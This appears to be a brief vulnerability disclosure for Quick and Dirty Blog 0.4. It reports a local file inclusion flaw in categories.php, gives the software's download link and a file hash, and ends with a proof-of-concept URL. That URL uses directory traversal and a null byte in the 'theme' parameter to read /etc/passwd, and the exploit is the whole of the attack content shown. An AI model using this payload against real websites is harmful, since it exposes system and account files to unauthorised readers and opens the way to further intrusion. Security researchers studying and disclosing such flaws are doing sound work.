Quick and Dirty Blog version 0.4 suffers from a local file inclusion vulnerability.
35adfbf0c184cd4d36678c0e1adbfe1f9def372491e2e621b0eea3ab6f2dc007
Quick and Dirty Blog 0.4 (categories.php) Local File Inclusion Vulnerability
http://heanet.dl.sourceforge.net/sourceforge/qdblog/qdblog-0.4.tar.bz2
POC:
/categories.php?theme=../../../../../../../../../etc/passwd%00